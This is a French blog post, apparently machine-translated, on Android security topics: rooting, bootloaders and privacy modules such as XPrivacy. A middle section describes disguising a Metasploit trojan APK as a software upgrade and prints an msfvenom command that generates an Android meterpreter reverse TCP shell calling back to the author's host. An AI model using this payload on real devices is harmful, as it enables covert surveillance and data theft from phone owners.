Source de l'image: pixabay.com

Introduction à Android

Dans ce sujet, nous allons en apprendre davantage sur Android et la sécurité Open Source (OS). Android est une plate-forme Open Source. C'est un peu comme Linux, mais toujours bien trop différent de Linux. Linux est beaucoup trop mûr par rapport à Android. Alors, c'est Chetan Nayak, et bienvenue sur mon prochain blog sur la sécurité Web Open Source. J'ai écrit ce blog en supposant que la plupart d'entre nous utiliseraient Android K, c'est-à-dire Kitkat ou Android L, c'est-à-dire Lollipop.

La raison d'être de Gingerbread et Jellybean avait beaucoup de problèmes de sécurité open source que je ne peux pas discuter dans ce blog unique. Donc, je vais peut-être en discuter la prochaine fois lorsque j'entrerai plus profondément dans les anciennes versions d'Android. Donc, pour l'instant, restons avec KitKat et Lollipop.

Android a été conçu pour les développeurs. Les contrôles de sécurité ont été conçus pour réduire la charge des développeurs. Les développeurs avertis en matière de sécurité peuvent facilement travailler avec et s'appuyer sur des contrôles de sécurité flexibles. Les développeurs moins familiarisés avec la sécurité seront protégés par des valeurs par défaut sûres.

Le début

Je n'étais pas beaucoup dans l'androïde jusqu'au dernier trimestre de 2013 lorsque j'ai eu mon premier téléphone portable Android qui était Sony Xperia L (basé sur 4.2.2 à partir de ce moment-là). Heck, j'ai même détesté Android, car il était extrêmement lent, en particulier les appareils Samsung. J'ai même envisagé d'acheter un Windows Lumia à l'époque, mais heureusement, je jouais à beaucoup de jeux, et j'ai dû acheter Xperia L car cette cellule était Lag Proof. Il avait environ 1 Go de RAM et Adreno 305. Assez cool pour faire fonctionner n'importe quoi.

Après avoir joué à beaucoup de jeux comme NOVA3 et ModernCombat4, je me suis ennuyé de cette cellule en un mois. Je savais qu'Android était basé sur Linux, et je voulais apporter certaines de mes modifications à cela. J'ai commencé à lire sur les personnalisations et j'ai appris ce qu'on appelait le «root». Comme j'avais un bon revers sous Linux, l'enracinement n'était pas un problème pour moi. Avec un peu d'aide de XDA, j'ai réussi à rooter ma cellule avec succès.

Mais alors quelque chose m'a frappé. Dès que ma cellule a redémarré après l'enracinement, elle a juste commencé la boucle de démarrage (bloquée pour toujours sur l'écran de démarrage). Je ne savais même pas quel bootloader était sous Android. Donc, je ne pouvais rien faire. Cela faisait juste un mois que j'avais acheté ma nouvelle cellule et ma cellule était maintenant en briques molles. Je lis toujours que l'enracinement est dangereux, mais je ne savais pas que cela brique mon Cell. Mais je me trompais. Alors que je continuais à lire une et toutes les autres choses sur l'enracinement, j'ai appris que l'enracinement ne cassait pas votre téléphone.

L'enracinement est similaire à l'accès administrateur sur un ordinateur (en fait, c'est un accès système, mais j'ai écrit l'accès administrateur, il est donc facile à comprendre pour les noobs.). Cela signifie que l'enracinement ne brisera jamais votre téléphone. C'est le chargeur de démarrage qui a briqué mon téléphone. Pour les personnes qui ne connaissent pas le chargeur de démarrage, c'est; le chargeur de démarrage est similaire au BIOS sous Windows. (Si vous ne savez pas ce qu'est le BIOS, alors vous ne devriez même pas lire penser à la sécurité en premier lieu.) Bootloader ou Hboot (c'est ce qu'on appelle dans Android) est la première chose qui s'exécute lorsque vous démarrez votre Android dispositif.

Il contient les instructions pour démarrer le noyau du système d'exploitation et la plupart d'entre eux sont spécifiquement conçus pour exécuter leur propre environnement de débogage ou de modification.

Le point de contrôle de sécurité d'Android

Considérez le chargeur de démarrage comme le point de contrôle de sécurité de votre appareil. Si vous cassez ce point de contrôle, vous allez perdre tout ce que vous avez sur votre téléphone. C'est donc une bonne fonctionnalité de sécurité, dis-je. Parce que si vous perdez votre téléphone et que quelqu'un essaie d'obtenir un accès root pour contourner le verrou (en supposant que vous avez verrouillé votre appareil avec un code PIN ou un mot de passe), il devra obligatoirement déverrouiller le chargeur de démarrage, ce qui entraînera l'effacement de vos données au téléphone.

Ainsi, vous n'avez pas à vous soucier de l'utilisation abusive par quelqu'un. Il en va de même pour les ROM personnalisées. Les ROM sont des systèmes d'exploitation basés sur des versions d'Android spécialement conçues pour votre architecture matérielle. Donc, si vous vérifiez sur XDA, pour votre téléphone, vous aurez n nombre de ROM personnalisées pour vos téléphones, certaines des plus célèbres étant les ROM Cyanogen Mod, qui sont déjà pré-rootées et viennent avec un ensemble prédéfini de personnalisations .

La neutralisation de la sécurité d'Android

Vous pensez peut-être dès maintenant que vous avez un téléphone portable sécurisé. Mais je suis ici pour vous prouver à nouveau que vous avez tort et c'est tout l'intérêt de ce blog. Au deuxième trimestre de 2014, les gens avaient déjà commencé à développer des exploits et des rootkits pour Android, qui pourraient rooter vos téléphones portables sans même déverrouiller les chargeurs de démarrage.

Pas assez effrayant? Permettez-moi de vous dire la partie la plus dangereuse. Ils pourraient même installer des chevaux de Troie à l'intérieur. Donc, même si les flics pouvaient retracer la cellule et que vous récupériez même votre cellule, il y a toujours un risque élevé qu'ils puissent voir tout ce que vous faites sur votre téléphone. C'est quelque chose que j'ai essayé comme expérience dans un environnement pratique réel.

J'ai utilisé Metasploit pour cette attaque. J'ai créé un cheval de Troie et l'ai installé sur le téléphone cible. C'était un simple fichier apk, et je l'ai appelé une mise à niveau logicielle. Donc, si l'utilisateur n'est qu'un homme ordinaire avec seulement un bit et un octet d'informations sur la sécurité, il n'osera même pas le supprimer. Et je me suis assuré que chaque fois qu'Internet serait activé, le malware que je créerais s'exécuterait automatiquement et se reconnecterait à mon port distant sur la machine hôte.

Les commandes suivantes ont été utilisées pour l'attaque (Metasploit est un logiciel de test de pénétration qui aide à vérifier les vulnérabilités sur une plate-forme ou des appareils spécifiques.)

Mon adresse IP hôte: 192.168.xx.xx

Mon port hôte (pour se reconnecter): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Donc, ici, j'ai créé un canal TCP inverse sur mon ordinateur. Ainsi, chaque fois qu'Internet démarre sur Android, je vais ouvrir un shell sur ma machine Kali ou la machine sur laquelle j'ai installé Metasploit.

Donc, maintenant vous savez à quel point c'est effrayant pour une personne que vous ne connaissez même pas, a des enregistrements de chaque transaction que vous effectuez via votre cellulaire, tous les autres contacts, les messages WhatsApp, SMS, Viber et le journal des appels Skype et tout. Si ce n'est pas effrayant, alors je ne sais pas ce que c'est.

Cours recommandés

  • Cours de certification en débogage Ruby
  • Cours PHP MySQL complet
  • Cours de certification en ligne en programmation VB.NET
  • Cours en ligne sur ITIL Foundation

La couverture

Assez sur les problèmes de sécurité. Nous savons tous que toutes les autres plateformes ont des problèmes de sécurité. Comment pourrions-nous être en sécurité alors? Ce n'est pas tout à fait vrai. Les plates-formes peuvent être sécurisées jusqu'à un point spécifique, mais après cela, c'est à nous de nous assurer qu'elles restent ainsi. Il y a une infâme citation dans le monde de la sécurité:

"Ingénierie sociale: Parce qu'il n'y a pas de patch pour la stupidité humaine"

J'ai entendu cette phrase il y a longtemps lorsque je regardais une conférence de DefCon.

Lorsqu'il n'y a aucune vulnérabilité technique à exploiter, vous devriez essayer de pirater les humains. Et, par cela, je ne parle pas d'hypnotisme et d'autres choses. Je veux dire l'ingénierie sociale. Vous pouvez lire mon autre blog «Importance de la cybersécurité dans notre vie de tous les jours» pour plus d'informations à ce sujet.

Fonction de sécurité principale d'Android

En outre, l'ingénierie sociale, qui ne peut être prise en charge que si vous êtes intelligent; il existe des moyens de développer des applications Android de manière sécurisée pour vous assurer que cela reste ainsi.

Voici donc quelques-unes des principales fonctionnalités de sécurité qui vous aident à créer des applications sécurisées:

  • Le Sandbox d'application Android, qui isole les données de votre application et l'exécution de code des autres applications.
  • Un cadre d'application avec des implémentations robustes de fonctionnalités de sécurité communes telles que la cryptographie, les autorisations et l'IPC sécurisé.
  • Un système de fichiers crypté qui peut être activé pour protéger les données sur les appareils perdus ou volés.
  • Autorisations accordées par l'utilisateur pour restreindre l'accès aux fonctionnalités du système et aux données utilisateur.
  • Autorisations définies par l'application pour contrôler les données d'application par application.

Que pouvez-vous faire si vous voulez un environnement sécurisé mais que vous n'êtes pas développeur?

À partir d'Android 5, c'est-à-dire Lollipop, il fournit une fonctionnalité où l'utilisateur peut ajouter plusieurs profils et modes restreints pour utiliser des téléphones et des tablettes. En outre, si vous avez rooté votre téléphone, il existe des applications Android dans les modules Xposed tels que AppOps, Xprivacy ou Privacy Guard qui peuvent vous aider à prendre soin de presque tout. Vous devez installer le Xposed Framework pour cela.

Xposed Framework est ce qui permet aux modules Xposed de fonctionner. Les modules Xposed vous permettent de modifier le comportement des fichiers Apk et des fichiers système sans avoir à installer une ROM différente. Il est également facile d'annuler les modifications, donc il y a peu de risques ici et cela ne prend même pas beaucoup de temps car il n'est pas nécessaire de flasher plusieurs ROM, noyaux et leurs corrections de bugs.

Xprivacy, Privacy Guard et AppOps sont des modules exposés qui vous permettent de sécuriser votre Android en choisissant quelle application doit avoir accès à quoi comme Internet, clavier, carte SD, accès root et beaucoup d'autres choses. Vous pouvez même désactiver l'accès à des services spécifiques uniquement et créer des modèles définis par l'utilisateur pour cela. Quant à moi, je préfère choisir Xprivacy. Mais voici quelques informations ou différences si vous vous méfiez de choisir entre les trois ci-dessus.

AppOps:

Cela a été initialement introduit par Google dans Android 4.3. (C'est la principale raison pour laquelle je ne le soutiens pas. Je ne fais pas confiance à Google. Appelez-le Paranoia, mais google retrace tout ce que vous faites. Et je n'ai pas besoin de quelqu'un pour garder une trace de tout ce que je fais, mais si vous faites confiance à Google, fonce.). La principale limitation d'AppOps est que Google vous permet uniquement de bloquer l'accès aux applications qu'il souhaite que vous bloquiez.

Cela signifie que si vous souhaitez bloquer les applications liées à Google, telles que les services Play (qui consomment en fait plus de 50% de votre mémoire, batterie et données normales (Internet)), vous ne pourrez pas le faire. C'est une raison de plus pour moi de détester Google. Donc, je pense qu'AppOps n'est rien d'autre qu'un malware pour moi. (mais c'est juste moi qui pense de cette façon, ce n'est pas si vous faites entièrement confiance à Google)

Privacy Guard:

Privacy Guard est une interface simple à utiliser conçue en remplacement d'AppOps par Cyanogen Mod. Si vous êtes un débutant, je vous suggère de l'utiliser, car il ne dispose que d'un bouton d'activation / désactivation et de modèles auto-définis quant au type d'application qui devrait avoir accès à quoi. Ce n'est pas si sûr s'il y a un malware qui agit ou usurpe l'identité d'une application système. Mais il est bon de vous lancer.

Xprivacy:

Xprivacy est un outil tout en un. Mais il s'adresse aux Experts. Vous pouvez le comparer avec un couteau suisse. Il contient tout et peut sécuriser votre téléphone de toutes les autres manières, mais si vous ne savez pas ce que vous faites, il ne fera que gâcher votre téléphone et arrêtera même le démarrage des applications. Vous pouvez également restreindre l'accès aux applications système. Celui-ci est ce que je préfère personnellement choisir.

Outre les modules ci-dessus, il existe même d'autres modules tels que Lightening Firewall ou BootManager dans Xposed, qui peuvent aider à restreindre l'accès à Internet pour des applications spécifiques et à empêcher les applications de démarrer à côté du système lors du redémarrage d'un téléphone.

Donc, ce serait tout pour ce blog. En cas de problèmes de sécurité, vous pouvez sûrement visiter ou être membre du site Web XDA qui peut vous accorder beaucoup plus d'informations sur la confidentialité.

Articles recommandés: -

Cela a été un guide pour Android. Ici, nous avons discuté du concept de base, des points de contrôle de sécurité et de la fonction de sécurité principale d'Android. Vous pouvez également consulter nos autres articles suggérés pour en savoir plus -

  1. Questions d'entrevue Android - Top 10 des questions utiles
  2. 8 Alternatives Siri utiles pour Android
  3. 28 meilleurs trucs et astuces pour les outils de développement d'applications Android
  4. Carrières dans le développement Android